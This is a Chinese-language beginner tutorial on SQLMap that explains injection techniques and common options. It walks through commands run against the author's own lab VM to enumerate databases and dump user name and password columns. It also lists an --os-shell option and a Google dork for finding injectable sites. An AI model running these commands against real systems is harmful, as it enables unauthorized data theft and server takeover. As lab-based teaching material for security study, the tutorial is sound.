【SQLMap工具-1】SQLMap简介及简单应用实例
1 SQLMap简介
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。
注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
SQLMap采用了以下5种独特的SQL注入技术。
• 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
• 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否己执行(即页面返回时间是否增加)来判断。
• 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。
• 联合查询注入,在可以使用Union 的情况下的注入。. 堆查询注入,可以同时执行多条语句时的注入。
SQLMap 的强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。SQLMap的功能强大到让人惊叹,当常规的注入工具不能利用SQL注入漏洞进行注入时,使用SQLMap会有意想不到的效果。
2 SQLMap安装
SQLMap的安装方式可以自己上网查找,本教程是利用KaliLinux上自带的SQLMap工具进行相关学习与实验,无需自己配置python等基础环境,较简单易上手,如何在虚拟机中安装KaliLinux系统请查看《【Linux系统】第2节 虚拟机中安装Kali系统》。
3 sqlmap的简单使用
3.1 常用命令及参数
查看sqlmap的命令字帮助手册
-u "url" #检测注入点
--dbs #列出所有数据库的名称
--current-db #列出当前数据库的名称
-D #指定一个数据库
--table #列出所有表名
-T #指定表名
--columns #列出所有字段名
-C #指定字段
--dump #列出字段内容
post注入
-r xxx.txt #xxx.txt为http数据包
–cookie #指定cookie
–os-shell #获取shell
sqlmap -g “inurl:php?id=” #利用google自动搜索注入点
3.2 具体操作实例
3.2.1 操作前准备
实验靶场——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例》
注入工具——kali虚拟机,自带sqlmap工具
注意,win2008和kali桥接到同一VMnet下。两者可以互相ping通。
3.2.2 具体实例
3.2.2.1 实例1:查看帮助手册
sqlmap -h
3.2.2.2 实例2:检测注入点及注入类型
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5"
当SQLMap执行该命令时,它会执行以下步骤:
- 1)判断可注入的参数;
- 2)判断可以用哪种SQL注入技术来注入;
- 3)识别出哪种数据库;
- 4)根据用户选择,读取哪些数据。
3.2.2.3 实例3:列出所有数据库的名字
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --dbs
3.2.2.4 实例4:列出当前数据库的名字
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --current-db
3.2.2.5 实例5:列出某数据库的所有表名
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' --tables
3.2.2.6 实例6:列出某表中的所有字段名
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' --columns
3.2.2.7 实例7:列出某字段中的所有字段内容
sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' -C 'name,password' --dump
3.2.2.8 实例8:post注入
首先利用burpsuite抓到使用post请求方法的http请求数据包,将该包保存为post.txt文件(保存在当前目录下)。输入代码:sqlmap -r post.txt
,会自动读取http数据包来做个post注入的测试
在本专栏博客中,主要以入门知识为主,引领零基础的伙伴了解一些工具的简单操作,会分享sqlmap的简单使用方法,比如:使用该软件来判断目标网站是否存在注入、查询获取数据库的库名表名字段名以及字段内容等信息.其他更详细的用法可详见sqlmap的帮助手册,如-level、-referer、roles等。
4 参考文章及优秀资源推荐
《sqlmap 详解》
《 sqlmap 官网》
《sqlmap文档地址》
【SQLMap工具-1】SQLMap简介及简单应用实例相关推荐
- sqlmap工具说明
目录 1 工具简介 3 1.1 简述 3 1.2 背景及需求 3 1.3 主要功能 3 2 功能确认 4 2.1 安装和使用 4 2.1.1 Windows操作系统 4 2.1.2 Linux操作系统 ...
- 【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
目录 1 前言 2 实验介绍 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 前戏 3.2 判断注入点及注入类型 3.3 爆库名 3.4 爆表名 3.5 爆字段名 3.6 爆字段内容 3.7 ...
- 【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...
- 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用
SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...
- SQLMAP工具 详细使用方法
文章目录 SQLMAP简介 SQLMAP支持的注入模式 SQLMAP支持的数据库 SQLMAP安装 Linux: Windows: 更新 SQLMAP参数详解 使用 Options Target Re ...
- SQLmap工具常用命令
SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具.它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹.访问底层文件系统.执行命令等等.
- sqlmap工具命令行的含义
SQLMAP参数介绍 sqlmap的使用方式:python sqlmap.py [options]: sqlmap中一共有以下十六个选项卡: 帮助选项卡: Target(目标选项卡): Request ...
- sqlmap工具使用用法详解
2019独角兽企业重金招聘Python工程师标准>>> sqlmap工具使用用法详解 QLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的 ...
- SQLMap中tamper的简介
目录结构 一.SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二.适配不同数据库类型的测试tamper 三.SQLMap中tamper篡改脚本的功能解释 一.SQLMa ...
- [工具使用]SqlMap
[工具使用]SqlMap SqlMap 常用指令 探测目标网站是否存在注入 查询数据库users 查询数据库passwords 查询数据库当前用户 查询当前数据库用户是否是管理员权限 列出数据库的管理 ...
最新文章
- java 整合solr_SpringBoot整合Spring Data Solr
- javascript格式化时间(几秒钟前,几分钟前,几小时前,几天前...)
- 神策数据产品演进及行业延展实践
- 笔记本网络计算机和设备不可见,xp电脑不显示无线网络的七种原因和解决方法...
- IE11浏览器:请不要再叫我IE,谢谢
- 灰色关联分析_R语言使用灰色关联分析(Grey Relation Analysis,GRA)中国经济社会发展指标...
- oracle 11g 数据库恢复技术 --rman catalog
- 数据库第二节 sql表格创建及内容插入和查询
- itk_option
- IOS 创建渐变图层
- R语言入门-安装R和Rstuido软件
- 必看,Mac苹果电脑重装系统教程
- 正则 纳税号_正则表达式号码靓号类型判断代码
- 从一条微博揭秘专黑大V名人的定向攻击
- nginx长连接——keepalive
- 运营必知的数据运营精髓
- 研究生期间如何赚外快
- 楼市步入慢行道 购房窗口期显现?
- 关于《机器学习实战》中创建决策树的核心代码分析
- 计算机教师师徒结对师傅总结,师徒结对师傅小结
热门文章
- 2021年上半年系统分析师下午真题和答案解析
- 信号公式汇总之拉普拉斯变换
- uniapp‘急‘速入门
- 在 uniapp 中使用 阿里巴巴矢量图标
- 概率论入门:概率分布
- QT5.14.2+VS2017环境安装
- zen brush 2 android,zen brush2
- Excel导入Sql Server出现Null的解决方法
- Excel导入SQL(VB.NET版)
- Android平台i2c-tools及16位地址读写,以及not executable: 64-bit ELF file解决办法